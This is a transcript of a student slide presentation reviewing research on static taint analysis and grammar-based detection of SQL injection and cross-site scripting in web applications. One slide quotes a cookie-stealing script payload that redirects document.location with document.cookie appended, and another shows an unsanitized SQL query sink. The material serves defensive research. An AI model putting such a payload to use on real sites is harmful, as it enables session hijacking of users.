Program Analysis for Web Application Security Presented by Justin Samuel For UW CSE 504, Spring ‘10 Instructor: Ben Livshits.

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

Runtime Prevention & Recovery Protect existing applications Advantages: Prevents vulnerabilities from doing harm Safe mode for Web application execution.
Context-Sensitive Interprocedural Points-to Analysis in the Presence of Function Pointers Presentation by Patrick Kaleem Justin.
Pointer Analysis – Part I Mayur Naik Intel Research, Berkeley CS294 Lecture March 17, 2009.
Finding Application Errors and Security Flaws Using PQL: a Program Query Language MICHAEL MARTIN, BENJAMIN LIVSHITS, MONICA S. LAM PRESENTED BY SATHISHKUMAR.
Type-based Taint Analysis for Java Web Applications Wei Huang, Yao Dong and Ana Milanova Rensselaer Polytechnic Institute 1.
GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.
Part 2 Authors: Marco Cova, et al. Presented by Brett Parker.
INF 212 ANALYSIS OF PROG. LANGS Type Systems Instructors: Crista Lopes Copyright © Instructors.
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
WebGoat & WebScarab “What is computer security for $1000 Alex?”
The Essence of Command Injection Attacks in Web Applications Zhendong Su and Gary Wassermann Present by Alon Kremer April 2011.
Finding Security Errors in Java Applications Using Lightweight Static Analysis Benjamin Livshits Computer Science Lab Stanford University.
Parameterized Object Sensitivity for Points-to Analysis for Java Presented By: - Anand Bahety Dan Bucatanschi.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
SOFTWARE SECURITY JORINA VAN MALSEN 1 FLAX: Systematic Discovery of Client-Side Validation Vulnerabilities in Rich Web Applications.
Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Gary Wassermann Zhendong Su.
Pointer and Shape Analysis Seminar Context-sensitive points-to analysis: is it worth it? Article by Ondřej Lhoták & Laurie Hendren from McGill University.
Control Flow Analysis Mooly Sagiv Tel Aviv University Sunday Scrieber 8 Monday Schrieber.
ReferencesReferences DiscussionDiscussion Vulnerability Example: SQL injection Auditing Tool for Eclipse LAPSE: a Security Auditing Tool for Eclipse IntroductionIntroductionResultsResults.
Program Analysis for Security Suhabe Bugrara Stanford University.
Swerve: Semester in Review. Topics  Symbolic pointer analysis  Model checking –C programs –Abstract counterexamples  Symbolic simulation and execution.
Leveraging User Interactions for In-Depth Testing of Web Applications Sean McAllister, Engin Kirda, and Christopher Kruegel RAID ’08 1 Seoyeon Kang November.
Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Gary Wassermann and Zhendong Su UC Davis Slides from
CHAPTER 10 Recursion. 2 Recursive Thinking Recursion is a programming technique in which a method can call itself to solve a problem A recursive definition.
1 RAKSHA: A FLEXIBLE ARCHITECTURE FOR SOFTWARE SECURITY Computer Systems Laboratory Stanford University Hari Kannan, Michael Dalton, Christos Kozyrakis.
Automatic Creation of SQL Injection and Cross-Site Scripting Attacks 2nd-order XSS attacks 1st-order XSS attacks SQLI attacks Adam Kiezun, Philip J. Guo,
Chapter Seven Advanced Shell Programming. 2 Lesson A Developing a Fully Featured Program.
Gulfstream Salvatore Guarnieri University of Washington Ben Livshits Microsoft Research Staged Static Analysis for Streaming JavaScript Applications.
CSCI 6962: Server-side Design and Programming Course Introduction and Overview.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
Automatically Hardening Web Applications Using Precise Tainting Anh Nguyen-Tuong Salvatore Guarnieri Doug Greene Jeff Shirley David Evans University of.
COMPUTER PROGRAMMING Source: Computing Concepts (the I-series) by Haag, Cummings, and Rhea, McGraw-Hill/Irwin, 2002.
Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna.
AMNESIA: Analysis and Monitoring for NEutralizing SQL- Injection Attacks Published by Wiliam Halfond and Alessandro Orso Presented by El Shibani Omar CS691.
Computer Security and Penetration Testing
Standalone Java Application vs. Java Web Application
Client Scripting1 Internet Systems Design. Client Scripting2 n “A scripting language is a programming language that is used to manipulate, customize,
JAVA SERVER PAGES. 2 SERVLETS The purpose of a servlet is to create a Web page in response to a client request Servlets are written in Java, with a little.
Accessing MySQL with PHP IDIA 618 Fall 2014 Bridget M. Blodgett.
CSC-682 Cryptography & Computer Security Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Pompi Rotaru Based on an article.
JSTL, XML and XSLT An introduction to JSP Standard Tag Library and XML/XSLT transformation for Web layout.
OWASP Top Ten #1 Unvalidated Input. Agenda What is the OWASP Top 10? Where can I find it? What is Unvalidated Input? What environments are effected? How.
Security Attacks CS 795. Buffer Overflow Problem Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program.
Slide 1 Vitaly Shmatikov CS 380S Static Detection of Web Application Vulnerabilities.
Finding Security Vulnerabilities in Java Applications with Static Analysis Reviewed by Roy Ford.
WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.
MT311 Java Application Development and Programming Languages Li Tak Sing ( 李德成 )
Pointer Analysis Survey. Rupesh Nasre. Aug 24, 2007.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Pointer Analysis – Part II CS Unification vs. Inclusion Earlier scalable pointer analysis was context- insensitive unification-based [Steensgaard.
Introduction Program File Authorization Security Theorem Active Code Authorization Authorization Logic Implementation considerations Conclusion.
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
1 Compiler & its Phases Krishan Kumar Asstt. Prof. (CSE) BPRCE, Gohana.
Javascript Static Code Analyzer
© 2011 IBM Corporation Hybrid Analysis for JavaScript Security Assessment Omer Tripp Omri Weisman Salvatore Guarnieri IBM Software Group Sep 2011.
Pointer Analysis – Part I CS Pointer Analysis Answers which pointers can point to which memory locations at run-time Central to many program optimization.
JavaScript Introduction and Background. 2 Web languages Three formal languages HTML JavaScript CSS Three different tasks Document description Client-side.
MOPS: an Infrastructure for Examining Security Properties of Software Authors Hao Chen and David Wagner Appears in ACM Conference on Computer and Communications.
Software Engineering Algorithms, Compilers, & Lifecycle.
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
SQL Injection.
Static Detection of Cross-Site Scripting Vulnerabilities
Theodore Lawson CSCE548 Student Presentation, Topic #2
All You Ever Wanted to Know About Dynamic Taint Analysis & Forward Symbolic Execution (but might have been afraid to ask) Edward J. Schwartz, Thanassis.
Representation, Syntax, Paradigms, Types
Securing Web Applications with Information Flow Tracking
CS5123 Software Validation and Quality Assurance
Presentation transcript:

Program Analysis for Web Application Security Presented by Justin Samuel For UW CSE 504, Spring ‘10 Instructor: Ben Livshits

Finding Security Vulnerabilities in Java Applications with Static Analysis V. Benjamin Livshits and Monica S. Lam Usenix Security ‘05

Unchecked User Input Input SourcesVulnerabilities Parameter manipulationSQL Injection URL manipulationHTTP response splitting Header manipulationCross-site scripting Cookie poisoningPath traversal Command injection When input is not properly sanitized before use, a variety of vulnerabilities are possible Static Analysis and Web App Security3

Detecting Unchecked Input Statically Goal: use static analysis to identify missing input sanitization. –We’ll call use of unchecked input “security violations.” Can we use existing points-to analysis? –Sound, precise, and scalable? Is points-to analysis all we need? Static Analysis and Web App Security4

Background: Points-to Analysis Determine which heap objects a given program variable may point to during execution. Desirable qualities: –Soundness No false negatives: every possible points-to relationship is identified. Being conservative leads to imprecision. –Precision Few false positives. –Efficiency Speed of analysis can be a problem Static Analysis and Web App Security5

Points-to Precision Problem An imprecise points-to analysis would not differentiate between possible objects referred to by s1 and s2. 1 class DataSource { 2 String url; 3 DataSource(String url) { 4 this.url = url; 5 } 6 String getUrl(){ 7 return this.url; 8 } } 11 String passedUrl = request.getParameter("..."); 12 DataSource ds1 = new DataSource(passedUrl); 13 String localUrl = " 14 DataSource ds2 = new DataSource(localUrl); String s1 = ds1.getUrl(); 17 String s2 = ds2.getUrl(); Static Analysis and Web App Security6

Imprecision From Context-Insensitivity pointsto( v : Var, h : Heap ) Static Analysis and Web App Security7 Object id( Object p ) { return p; } x = id( a ); y = id( b ); ab p xy

Context-Sensitive pointsto( vc : VarContext, v : Var, h : Heap ) Static Analysis and Web App Security8 Object id( Object p ) { return p; } x = id( a ); y = id( b ); ab p2p2 xy p1p1

Context-sensitivity and Cloning The context of a method invocation is distinguished by its call path (call stack). k-CFA (Control Flow Analysis): remember only the last k call sites. Use cloning. [Whaley, PLDI 04] –Generate multiple instances of a method so that each call is invoking a different instance. –∞-CFA when there is no recursion. –Does cloning sound familiar? KLEE? Static Analysis and Web App Security9

Exponentially many points-to results. Use Binary Decision Diagrams (BDDs) for solving points- to analysis [Berndl, PLDI ‘03] Use BDD-Based Deductive DataBase (bddbddb) [Whaley & Lam, PLDI ‘04] –Express pointer analysis in Datalog (logic programming language). –Translate Datalog into efficient BDD implementations. Scalability of Context-Sensitivity Static Analysis and Web App Security10 Image: decision_diagram

Imprecision From Object-Insensitivity pointsto( v : Var, h : Heap ) Static Analysis and Web App Security11 x = new Foo(); y = new Foo(); a = new Bar(); b = new Bar(); x.v = a; y.v = b; x, y ab v Note: this is actually showing field sensitivity, not object sensitivity.

x x Object-Sensitivity pointsto( vo : Heap, v : Var, h : Heap ) Static Analysis and Web App Security12 x = new Foo(); y = new Foo(); a = new Bar(); b = new Bar(); x.v = a; y.v = b; a v y y b v Note: this is actually showing field sensitivity, not object sensitivity.

Imprecision From Maps/Collections Maps with constant strings are common Static Analysis and Web App Security13 HashMap map = new HashMap(); String x = req.getParam(“x”); map.put(“NAME”, x); String t = “boss”; map.put(“TITLE”, t); String y = map.get(“TITLE”); map xy data t

Map-sensitivity Model HashMap.put/get operations specially Static Analysis and Web App Security14 HashMap map = new HashMap(); String x = req.getParam(“x”); map.put(“NAME”, x); String t = “boss”; map.put(“TITLE”, t); String y = map.get(“TITLE”); map xyt “TITLE”“NAME”

Flow-Sensitivity Flow-sensitive analysis computes a different solution for each point in the program. Common difficulties: –Strong updates difficult, thus weak updates used. Is this a problem for functional languages? –Efficiency. Approach: use only local flow (within methods) Static Analysis and Web App Security15

Putting It Together Object-sensitivity + Context-sensitivity gives the following relation: pointsto( vc : VarContext, vo : Heap, v : Var, h : Heap ) Plus map-sensitivity and special handling of Java string routines. “1-level object-sensitivity” (?) [Livshits slides]: pointsto( vc : VarContext, vo 1 : Heap, vo 2 : Heap, v : Var, ho : Heap, h : Heap ) Static Analysis and Web App Security16

1 String param = req.getParameter("user"); String query = param; con.executeQuery(query); Points-to Analysis and We’re Done? Static Analysis and Web App Security17 Points-to analysis gives us static knowledge of what an object refers to at runtime. To find missing input checks, we still need to identify objects sources and sinks.

Use PQL for Taint Analysis Same PQL that we saw a few weeks ago. Specify sources, derivations, and sinks Static Analysis and Web App Security18

Integration with Eclipse TODO Static Analysis and Web App Security19

Vulnerabilities Discovered Discovered 23 vulnerabilities in real applications. –Only 1 was already known. –1 found in library (hibernate), another in J2EE implementation. 4 of the 23 are the same J2EE implementation error. –“Almost all errors we reported to program maintainers were confirmed.” –Also found 6 vulnerabilities in webgoat. 12 false positives. –All in one app (snipsnap) due to insufficient precision of object-naming Static Analysis and Web App Security20 SQL injectionsHTTP splittingXSSPath traversalTotal Header manip06309 Param. manip Cookie poison00000 Non-Web input20035 Total

Evaluation Summary Summary of data on the number of tainted objects, reported security violations, and false positives for each analysis version. Enabled analysis features are indicated by checkmarks Static Analysis and Web App Security21

Number of Tainted Objects Comparison of the number of tainted objects for each version of the analysis Static Analysis and Web App Security22

Timing Evaluation Static Analysis and Web App Security23

Limitations Dynamic class loading and generation. Reflectively called classes. –For reflective calls, a simple analysis is used that handles common uses of reflection Static Analysis and Web App Security24

Essence of Command Injection Attacks Zhendong Su and Gary Wassermann POPL ‘06

Taint Analysis is Not Sufficient Sanitization of user input can be inaccurate. Checked input is not always safe. –Inaccurate checking may allow it to alter the structure of commands constructed from the string Static Analysis and Web App Security26

SQL Injection Parse Tree Example Static Analysis and Web App Security27

Modify Input, Use a New Grammar Define an augmented grammar with additional production rules using new delimiters: Add the delimiters around all user input. Make sure commands parse correctly with the new grammar before stripping delimiters and running the real command Static Analysis and Web App Security28

Applicable Beyond SQL Injection The idea is “general and appl[ies] to other settings that generate structured, meaningful output from user- provided input.” –Cross-Site Scripting (XSS) –XPath injection –Shell injection Static Analysis and Web App Security29

Cross Site Scripting The following attack input could be detected: > document.location=' bin/cookie.cgi?'%20+document.cookie</script –It is “…not a valid syntactic form, since the first character completes a preceding tag.” What grammar does one augment? –XSS can be within HTML or JavaScript. –Can this input be XSS and what syntax would it violate? javascript:document.location= Static Analysis and Web App Security30

Evaluation Static Analysis and Web App Security31

According to the Authors PQL trusts user filters, so it does not provide strong security guarantees. SQLCheck (their system) does not address completeness. They intend to look at static analysis to instrument code without requiring it all to be done manually Static Analysis and Web App Security32

Summary Livshits and Lam, ‘05 –Improve existing points-to analysis. –Use PQL for taint specification and analysis. –Combine into a working Eclipse plugin. –Found previously unknown vulnerabilities in real applications. Su and Wasserman, ‘06 –Formal definition of command injection attacks. –Write a grammar for structured output and see if the user input changes the structure. –Manually modify all places where input enters code and where commands are executed. –Prevented known SQL injection vulnerabilities in their own tests Static Analysis and Web App Security33

References and Related Work “Points-to Analysis using BDDs.” Marc Berndl, Ondrej Lhotak, Feng Qian, Laurie Hendren and Navindra Umane. PLDI “Pointer Analysis: Haven’t We Solved This Problem Yet.” Michael Hind. PASTE “Finding Security Vulnerabilities in Java Applications with Static Analysis.” V. Benjamin Livshits and Monica S. Lam. Usenix Security “Resolving and Exploiting the k-CFA Paradox: Illuminating Functional vs. Object-Oriented Program Analysis.” Matthew Might, Yannis Smaragdakis, and David Van Horn. PLDI “The Essence of Command Injection Attacks in Web Applications.” Zhendong Su and Gary Wassermann. POPL “Cloning-Based Context-Sensitive Pointer Alias Analysis Using Binary Decision Diagrams.” John Whaley and Monica S. Lam. PLDI Static Analysis and Web App Security34

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.